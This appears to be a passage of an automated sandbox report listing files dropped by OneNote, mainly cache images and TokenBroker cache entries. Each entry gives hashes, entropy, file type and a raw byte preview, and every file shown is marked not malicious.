Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.9257044705369477
Encrypted:	false
SSDEEP:	48:e0sCDn8L8Lk9t2n66E1Li9NVSL6MhwrXwX9NsIpy5rdMrHHEFXC/iczizVOwNi85:e0sTL8Lk9QXE1gN0foXwX9N1ERMHkzr
MD5:	D86552A35317E949C857579B8E65C5EF
SHA1:	E1978B111BC8D88E40F8C01EE9222F2B1E0CF592
SHA-256:	750A9E18886280DFEF9518557F89EEDF66A348DE079837C184CAF7C5747DBCA2
SHA-512:	8DBD078BFA9B595668088FB6259BD6AEAF0AAA4512B340D1DB0D761B6F02864609A6CB61E4255C23A6C2DEAAEFB3026E14FBE499D36C885AAD5A7412265FA08D
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ...........q..1..O.........q..1..O...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............2..b.K.6..."Nf0....N...^..................U.8RE...T. ..........f........................................I.qk..B.....LZ.............2..b.K.6..."Nf0.........2..b.K.6..."Nf0........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.344952222346411
Encrypted:	false
SSDEEP:	48:eBsycP8S8933A8dtLmofE41cpX3p9RsjpyxrdMrXLoWqFXrDKbMFPcAaUg:eBs58x3A8d5fEDpX3p9RKsRM7oWq9oU
MD5:	587DD300CD71A6A26CBBFF6D92B472D0
SHA1:	8142E689A6C8F2AA88B31F7882D01E71E2E36D97
SHA-256:	3C7E37773A2A796FA804F9AB72C1ECC755992CD46722F2229C6B6D3F57ED2179
SHA-512:	8ECDFF89DF5DC2758034DF699C9FD6035E5D7E4E077BE8779B0BCFF5250CB615F882E17556CAB37FB12F513F0D4D8EFC5D20C4A9F5679F532059BDEE358E2434
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.4k......4k(....8....\|...4k(....8....\|...4k..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............L....x.)b.a.......N...^................1....DK......\.........f........................................I.qk..B.....LZ.............L....x.)b.a............L....x.)b.a.............4k......4k......4k..........................................4kj.....4kT.]...4k......4k..B...4kH.....4k..B...4k..>.).4k..J...................;........4...4...4.."...............4k..4k..4k..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........4k......4k....#.4k............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.308297892786496
Encrypted:	false
SSDEEP:	48:GsFSN5Y23jtvhnE3ymxXVbF91u8sDpyxrdMrpnt5J2FXf9mrpyJ:Gsy53j7EtXj91bKURM+Oty
MD5:	D40FEBC699C4B1E76E11F94225587BB8
SHA1:	FDC8FC1762528AF52A8EA669651CF8B0BD7F2FBB
SHA-256:	C8067C939EEB0DF9781FB884527C8E21C5090404767888298C623F0E26977632
SHA-512:	D3256C0A92B66FDE5E74C038FA34301A9FD4953071BBA0F1D9ABB448BF90E278C69A2093C2B212D024FBE017C02871F19E99474C2AF2285185531F0F12FEEEF6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ. 8...... 8.e$U.4.m..<.q. 8.e$U.4.m..<.q. 8..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............[.1..Y..=... .40....N...^...............v=.D..0A.v..............f........................................I.qk..B.....LZ............[.1..Y..=... .40........[.1..Y..=... .40.......... 8...... 8...... 8.......................................... 8j..... 8T.]... 8...... 8..B... 8H..... 8..B... 8..>.). 8..J...................;........4...4...4.."............... 8.. 8.. 8..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.......... 8...... 8....#. 8............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.387317393700972
Encrypted:	false
SSDEEP:	48:1qAL/A5SOBy8jnXEDbPUErl7D/OpLqGLxLZLxsLmLcLwDL:1ql8OLbEDb8Edmt1l9qW8wv
MD5:	773413C46B82167C37FCA6A78D900512
SHA1:	DC80C6D681653ECD142CEB3F635FE989E8AB71E1
SHA-256:	6B4FF9CBBAB63293EE71D057B3BC544DE4B7C49361883966175CD3E2C26DCC4B
SHA-512:	FE3A01559C05505D8BB042655C38D7CF6DC299801DA0F64F212975991E6E7E0C3D654EF06F91A710AC7FCEC0192753B3E24A8AC5C687E70E359052368B5968EB
Malicious:	false
Preview:	........0.......................................................?...............................................................................................h.......................................t.".....t."\|W.J..S.4ZYY..e.......e.."5.............."z.v.........e.."5.......K..e..+....F....9..+.....................................................................t."T&h......{....X........4.............$..i..T(T...+.T.9................4..(.....x.(.....E<......E<.^W.S./.b.~l..+.......+....F....9..2.......v.......4...............t."...e.E<...........................+........e..c..,0...e...B4.$........[.-...I.......9......................E<.^W.S./.b.~l.E<..X}`d........p..NX}`..+....F....9..+......>.......@.........e.."5.......K.+....F....9.............................."z.v.....+.......+....F....9.......t.".....E<...c..,0...e...B4.$..............E........................................0...........e....4..................T.o. .D.o. .L.i.s.t........s.)..O@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9217341231600966
Encrypted:	false
SSDEEP:	192:yu5sY+pFTi29KfV9YOk6ck2kwsoYwnVX0jTgMec9RzkxtPGyd9my+X:qY+pvo7uPWBV9Rztyd9my+X
MD5:	E17B359CEB395547D8220F7524914B78
SHA1:	FAEEACF3BE05046364576B81BA9BD0A072ABABE8
SHA-256:	3FE364B06A36B31EA4D95B3ACAAD90B9DD3AF117DEC937AB1CE5330988EF2605
SHA-512:	432D5665607A09C806B34853D46FD33BC3F600AAE163C7A7E84EFB4A5363DDC0CC2C80DE469111AF06B5BB4ADEEBEE8D82CB73983495C30E19497AE61AC25951
Malicious:	false
Preview:	2...>...........v........ .. "..2...>...d...<...v.......@....!...........................................................................................................................................I.......I.qk..B.....LZ=&C.;...=&C.i...3.&-cT.q=&C.i...3.&-cT.q=&C..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e.....#.W/...h....N...^................D<..B:F... @.N.............(...............................D....I.qk..B.....LZ..............e.....#.W/...h.................................=&C.....=&C.....=&C.........................................=&Cj....=&CT&~..=&C.....=&C..g..=&CH....=&C .)..=&C$....=&C..u...................;........4...4...4.................=&C-=&C.=&C..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(=&C#=&C8=&C..z...,4. .......$>........4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.065842515306395
Encrypted:	false
SSDEEP:	192:WfvzFp0BN/nW5lpYzewmMOpn36r7/g6ryX0JwqRJGtBWqybyT3gq94iKkU3ZBNeE:ep0L/gcGERJwT6Y4CC7t
MD5:	8848FF9165B876F837177E2ED8A69F42
SHA1:	C990809274872DA438B205D92C5B9368D70BD881
SHA-256:	747A27CCEA14FDD8AEAAE2A752D2C4C699A07180FCFB86FC6E6D160EB5D206C1
SHA-512:	6565F44ED492A995575B27BDB16C06A39B1302A4902B1B88034B22F22EFE38B74886ECDB1DB07A7361043F986F369D914D33B72C09E676D6C7CF669CCA1B26E2
Malicious:	false
Preview:	....>.......,...D.......x ..`9......>.......\|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ............{...2.b.\|f....;.m...)..9.zA..;.....{...2.b.\|f.......I.qk..B.....LZ.I.............;.......;.......;...........................................;j......;T.t....;.......;..N....;H......;..5....;..F.%..;..................;........4...4...4...............;:..;L..;..z...y.. x.. ...........$........2..72..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'..;%..;9..;..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1.........;......;....%..;#...'..;&...2..;....9..;....:..;$......;........'..;%..;..;..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3...................;:..;...;..z...y.. x.. ...........$........2..72..7.....*

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.815649718329845
Encrypted:	false
SSDEEP:	192:JsWGxkrr5QAyf9AqNRXZVvV6UpRXauzERJdskKCUSrma98Uj9ZdmeDAiE9pg54W7:uTtNRXz9v7DERJ4CUomi8URWGAiOWKC9
MD5:	2D521EDF795B79FACD476B2D379E70AE
SHA1:	910F3646E7DF637B50C1DA1102200F7BD3C09E5E
SHA-256:	CBB8603C3B7427C746F8896BA8A20CA801D743BA379DD520462CF8C74BAD9235
SHA-512:	CDC6F2C5D6BE2DF5D302B1467C1CEDEF3676AD67CD5BF2CA989A69395720E7692782DA833404BF94E264082849820583FBF270AC852FC659FF1DA3DBFE4891B5
Malicious:	false
Preview:	2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ..].P.....]..........ce-..]..........ce-..]..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............g..X.... .K.K......N...^................Cq..-.E....}..`.................................................I.qk..B......LZ............g..X.... .K.K.....................................].......].......]...........................................]j......]T......]..o....].......]..O....]..s....]$.A.$..]$.................;........4...4...4...............]3..]X..]..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9...............]3..]z..]..z...y.. x.. ...........$........2..72.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.847189188176961
Encrypted:	false
SSDEEP:	48:uiTrlKxsxxOxl9Il8uyUShDRkAOfTys1B2d1rc:vKYNShVkAO791Bt
MD5:	D455841A26D499A0ED05A80F661E46D2
SHA1:	A4EAF99A793BF9D2BF53F0A64A8C2720B7E1C950
SHA-256:	4C4E6D8AB851AFC15C19D3F4181B6DABE629D589338F4C903E9C528073CF88F5
SHA-512:	82507608EDDEBA50198EAD87127AB404C9503C4A4FA06D49199C3CAF2F7555E6AED1CC37A8EE68EE91027C948549F49AA0DC570A20FA40620642DE862C5E163A
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.G.p.H.b.D.c.7.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.M.+.3.X.V.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6106
Entropy (8bit):	4.017541794043341
Encrypted:	false
SSDEEP:	96:wYTXVShuqe/+l74GwF+Uup2ImaKJ0fQIjZPnU:w0X0uqeGh6+UHn5J0flU
MD5:	85F6FE1EAAD4BF307413B0363FC0A806
SHA1:	1D6452A955659352DE1EBECEAC2113DB62DBD60A
SHA-256:	C6BDEA1CF37A17A74E0D1715B90754E620302FE75800F7A50E71DD2560F0D195
SHA-512:	BE4C2C3A8799B2AE4A913809CA16B6A58B7AADF7ECB1D960C3F2DC08B646E3CD4001FAE57F93552C7ADEAE766B159CDB3C421DC96DE6375D0C5744741D67C2D3
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".1.O.1.e.g.w.B.a.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.N.M.+.3.X.V.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4542
Entropy (8bit):	3.996313023139327
Encrypted:	false
SSDEEP:	96:wYjNBY0y9GjzTSmujcm7UhCNdxctH1fPNeXsoLVd:wy6YjzWHjcvyKobZd
MD5:	E9F348BBB523E45526ADEF3452449EA7
SHA1:	64D4EC1796D7EDF5EAE5C17BB5C809D29E14D945
SHA-256:	71097C2C1473EE69CEE91F2E0A8FE171BB584A1041C6D0E47884C6D5526D99E4
SHA-512:	B38C3867A961E751A36A73BAF0FA8624DE348821C9B3A122238E56AAE573C7F510BE23E8810ACD6ACF1AF815ABCEF1EF3D548756294BDE8D6E19332F6E1ACDBD
Malicious:	false
